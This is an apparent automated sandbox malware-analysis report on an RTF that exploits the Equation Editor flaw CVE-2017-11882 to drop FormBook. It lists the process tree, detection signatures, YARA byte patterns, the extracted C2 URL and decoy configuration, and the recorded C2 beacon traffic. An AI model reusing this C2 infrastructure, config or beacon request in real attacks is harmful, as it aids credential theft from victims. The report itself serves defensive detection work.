Windows Analysis Report
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.1520

Overview

General Information

Sample Name: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.1520 (renamed file extension from 1520 to rtf)
Analysis ID: 680332
MD5: 26111b2647fc8b1e3e123e825f716b94
SHA1: 131907f569a2774c1800430ccf052896dc685ec0
SHA256: 7d4a1c05f377343f063e0b265fc85f928b59f0cd88914f2b2715c4a25c734838
Tags: rtf

Detection

Threat: FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Document contains OLE streams which likely are hidden ActiveX objects
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Office process drops PE file
Writes to foreign memory regions
Document contains OLE streams with names of living off the land binaries
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Found potential equation exploit (CVE-2017-11882)
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Found suspicious RTF objects
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Document contains Microsoft Equation 3.0 OLE entries
Searches the installation path of Mozilla Firefox
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Office Equation Editor has been started
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Creates a window with clipboard capturing capabilities
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2556 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1300 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • cmd.exe (PID: 2992 cmdline: CmD.exe /C %tmp%\Client.exe A C MD5: AD7B9C14083B52BC532FBA5948342B98)
      • Client.exe (PID: 2948 cmdline: C:\Users\user\AppData\Local\Temp\Client.exe A C MD5: D94161753531177B2FB80365ADDCBFA8)
        • notepad.exe (PID: 2496 cmdline: C:\Windows\SysWOW64\notepad.exe /Processid:{9A42BBC4-4F4B-4518-841E-56E3DAA7341B} MD5: A4F6DF0E33E644E802C8798ED94D80EA)
          • explorer.exe (PID: 1860 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • NAPSTAT.EXE (PID: 204 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)
              • firefox.exe (PID: 2420 cmdline: C:\Program Files (x86)\Mozilla Firefox\Firefox.exe MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • cleanup

Malware Configuration

FormBook: {"C2 list": ["www.bookmarkfiles.info/aekc/"], "decoy": ["RMXvmWv1T8LnwQ==", "Eihj8MxKqewaukr9kA==", "+g6zzMM6GRqNBkX3uOBoqQ==", "pWRxiwc2Bfok7RT5", "vPwdzH5MqglB6x8BBR1yrw==", "MjC+3B4RiO87RDzpmA==", "38QEn2bgSsIbukr9kA==", "H/gg2eB11REpukr9kA==", "nR93HiGa/mm/l+rJcb0fzd3Ys9oH32E71g==", "1tdkeMK6HwpkdW9G/kFSNwwB2TiAJg==", "oxrGgFLiVZy7cJxgKmur4bIu", "1dZdfsq5k9TlwQ+5duE=", "b0J+ndKQ9h05o6NV8lOr4bIu", "fjfP53bwT8LnwQ==", "hTvn/If7T8LnwQ==", "FDzSk+QA0/1P", "9jlCyLJev/gnukr9kA==", "hRGrJJDDvPMQTa2POpTalloPghMa", "ioI1Oi/bWM0DVVpH/GXBQtDC3A==", "7Qq8yL5gzg702uLu", "9aS3x0Ry6dY4ZZ99S5PKQtDC3A==", "yMYCrLpn10a3R1E1AFOv6ack", "w8w/bvcWATu7PDDwfd0JuYgI0A==", "NTbg7NdXVle3N1Pu0CUw", "OQQbz5yH+jOxwQ+5duE=", "qTrBdXUWf8vwGBk=", "oi21Ou1SR37/pPq9U7m6Nz8E2TiAJg==", "l9PJcHotT8LnwQ==", "K/QPqqhuzMkB7PjYiKZAb3I=", "roGw5GmYgsUk7RT5", "gTxXZNw8T8LnwQ==", "5N+VzPa9HhZ0f3pRGniEeDcs3PI=", "CeIVuGevoMbvN5Fr/GCr4bIu", "hkZ+riVUPmvvfHcYBlWl36Yl1A==", "nOfvBG59bKkwzdeNIYPFQtDC3A==", "W57fbAhOOkGdGkIAo/NP/cqJ4vQ=", "E8tuxTQzaqZB", "ugwnTscE8fYk7RT5", "JrAINpN+XL0d4hLnlek=", "qESZmsanHEjMukr9kA==", "/v06r9lmzw==", "W/CcThAzaqZB", "xML0nKZguwUN8QY=", "5XIhrh0dlLk/oBZibInIQtDC3A==", "Z3C7ZmwGA/ok7RT5", "DRi50wcM+2wQsQLoicXEOQGAKNP232E71g==", "AF+XxB0kk4HhnuLXn/My8Ho=", "HGucKuFQc/pymOzcmA==", "voOmzEFjVr0JRm5E+l2r4bIu", "ddDg/GlYzfQZ5iHve6ZAb3I=", "XBxNffL72iGfJX1tbaKguA==", "MxhV44jVxD+PGPbYmA==", "0WeywuzZvww2iA/WfPY=", "1myvw0eaf6gklfODaZ4sYmw=", "SOOWE3prlNJZ", "MTC9xPPkUjxsT0kf1DN/SAx8OvRxRA6h", "0JyrUE8FaI8iJxvXdqZAb3I=", "Hd4mSndaPXTmig/WfPY=", "11PeMCuzsqHVJ0nu0CUw", "0iQvcErbTcQcukr9kA==", "LH+NhcKpDC1XGHbu0CUw", "gThzlciV/PsyEVPxn/Q67no=", "lIgXFAarBzy5uA+5duE=", "31gOPnVkSwUN8QY="]}
Yara Matches

Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf
Rule: MAL_RTF_Embedded_OLE_PE
Description: Detects a suspicious string often used in PE files in a hex encoded object stream
Author: Florian Roth
Strings:
  • 0x78b4:$a1: 546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f6465
  • 0x7818:$m1: 4d5a90000300000004000000ffff

Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf
Rule: INDICATOR_RTF_MalVer_Objects
Description: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents.
Author: ditekSHen
Strings:
  • 0x1269:$obj2: \objdata
  • 0x1df799:$obj2: \objdata
  • 0x2bfdaf:$obj3: \objupdate
  • 0x8de:$obj4: \objemb
  • 0x1dee0e:$obj4: \objemb
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp
Rule: rtf_cve2017_11882_ole
Description: Attempts to identify the exploit CVE 2017 11882
Author: John Davison
Strings:
  • 0xea600:$headers: 1C 00 00 00 02 00 9E C4 A9 00 00 00 00 00 00 00 C8 A7 5C 00 C4 EE 5B 00 00 00 00 00 03 01 01 03 0A
  • 0xea621:$font: 0A 01 08 5A 5A
  • 0xea652:$winexec: 12 0C 43 00

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp
Rule: EXP_potential_CVE_2017_11882
Description: unknown
Author: ReversingLabs
Strings:
  • 0x0:$docfilemagic: D0 CF 11 E0 A1 B1 1A E1
  • 0xea500:$equation1: Equation Native
  • 0x920:$equation2: Microsoft Equation 3.0
  • 0x280c:$exe: .exe
  • 0x281f:$exe: .exe
  • 0x283a:$exe: .exe
  • 0xea629:$exe: .exe
  • 0xea63d:$exe: .exe
  • 0xea652:$address: 12 0C 43 00
Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp
Rule: Windows_Trojan_Formbook_1112e116
Description: unknown
Author: unknown
Strings:
  • 0x6601:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1d780:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa93f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x16b67:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83

Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x16965:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x16411:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x16a67:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x16bdf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa50a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1565c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb252:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1c3d7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1d4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x18e29:$sqlite3step: 68 34 1C 7B E1
  • 0x18f5c:$sqlite3step: 68 34 1C 7B E1
  • 0x18e6b:$sqlite3text: 68 38 2A 90 C5
  • 0x18fb3:$sqlite3text: 68 38 2A 90 C5
  • 0x18e82:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18fd5:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

(62 further memory-dump entries not shown)
Source: 9.2.notepad.exe.400000.1.raw.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 9.2.notepad.exe.400000.1.raw.unpack
Rule: Windows_Trojan_Formbook_1112e116
Description: unknown
Author: unknown
Strings:
  • 0x6601:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1d780:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa93f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x16b67:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83

Source: 9.2.notepad.exe.400000.1.raw.unpack
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x16965:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x16411:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x16a67:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x16bdf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa50a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1565c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb252:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1c3d7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1d4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 9.2.notepad.exe.400000.1.raw.unpack
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x18e29:$sqlite3step: 68 34 1C 7B E1
  • 0x18f5c:$sqlite3step: 68 34 1C 7B E1
  • 0x18e6b:$sqlite3text: 68 38 2A 90 C5
  • 0x18fb3:$sqlite3text: 68 38 2A 90 C5
  • 0x18e82:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18fd5:$sqlite3blob: 68 53 D8 7F 8C

Source: 9.0.notepad.exe.400000.2.raw.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

(39 further unpacked-PE entries not shown)

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf | ReversingLabs: Detection: 14%
Source: Yara match | File source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp | Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Source: C:\Users\user\AppData\Local\Temp\Client.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Joe Sandbox ML: detected
Source: 9.0.notepad.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.notepad.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook (same C2 list and decoy configuration as extracted above)

          Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\cmd.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\cmd.exe
Source: Static RTF information | Object: 1 Offset: 001DF7BDh
Source: ~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp.0.dr | Stream path '_1721465588/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: notepad.pdb | source: NAPSTAT.EXE, 0000000B.00000002.1177850032.0000000000433000.00000004.00000020.00020000.00000000.sdmp, NAPSTAT.EXE, 0000000B.00000002.1180581876.0000000002303000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000000.1154674128.0000000000593000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: notepad.exe, notepad.exe, 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1042200687.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.945235876.00000000001F0000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.946852409.0000000000970000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: notepad.pdbx | source: NAPSTAT.EXE, 0000000B.00000002.1177850032.0000000000433000.00000004.00000020.00020000.00000000.sdmp, NAPSTAT.EXE, 0000000B.00000002.1180581876.0000000002303000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000000.1154674128.0000000000593000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: napstat.pdb | source: notepad.exe, 00000009.00000003.1038035602.000000000088C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1039905006.00000000002E0000.00000040.10000000.00040000.00000000.sdmp

          Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: Client.exe.0.dr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\Client.exe
Source: global traffic | DNS query: name: www.magadirect.co.uk
Source: global traffic | DNS query: name: www.sqlite.org
Source: global traffic | DNS query: name: www.luanaterra.online
Source: global traffic | DNS query: name: www.hogogala.com
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.33.18.44:80
Source: global traffic | TCP traffic: 45.33.18.44:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.33.18.44:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.33.18.44:80
Source: global traffic | TCP traffic: 45.33.18.44:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.33.18.44:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.33.18.44:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.33.18.44:80
Source: global traffic | TCP traffic: 45.33.18.44:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80
Source: global traffic | TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49172
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80
Source: global traffic | TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49172
Source: global traffic | TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49172
Source: global traffic | TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49172
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80
Source: global traffic | TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49172
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.33.18.44:80
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80

          Networking

Source: C:\Windows\explorer.exe | Domain query: www.magadirect.co.uk
Source: C:\Windows\explorer.exe | Network Connect: 45.33.18.44 80
Source: Malware configuration extractor | URLs: www.bookmarkfiles.info/aekc/
Source: Joe Sandbox View | ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
Source: global traffic | HTTP traffic detected: GET /aekc/?p6A=k0tTOTrAn50YQe1h4ozxDNX4wd5+O6pkKrWAMwmyhhYwJBfC5YpDY/r3FGLgLX7DF3fRHoVtyXQnCSOz0Ea/6qte5rYurCT1UmXBzRE=&xjRt=ZvcPNdzxaTTX6DM HTTP/1.1 Host: www.magadirect.co.uk Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | IP Address: 45.33.18.44 45.33.18.44
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found server: openresty/1.13.6.1 date: Mon, 08 Aug 2022 10:08:49 GMT content-type: text/html content-length: 175 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close Date: Mon, 08 Aug 2022 10:09:09 GMT Content-type: text/html; charset=utf-8 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 20 6c 69 6e 65 6e 6f 3d 22 33 39 30 22 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 6f 63 75 6d 65 6e 74 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 2f 32 30 31 34 2f 73 71 6c 69 74 65 2d 64 6c 6c 2d 77 69 6e 33 32 2d 78 38 36 2d 33 30 38 30 37 30 30 2e 7a 69 70 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 0a 3c 2f 62 6f 64 79 3e 0a Data Ascii: <head><title lineno="390">Not Found</title></head><body><h1>Document Not Found</h1>The document /2014/sqlite-dll-win32-x86-3080700.zip is not available on this server</body>
Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://java.sun.com
Source: explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 0000000A.00000000.1001877731.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: Client.exe, 00000005.00000002.947458698.0000000002671000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000A.00000000.1008328661.0000000006450000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 0000000A.00000000.1001877731.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
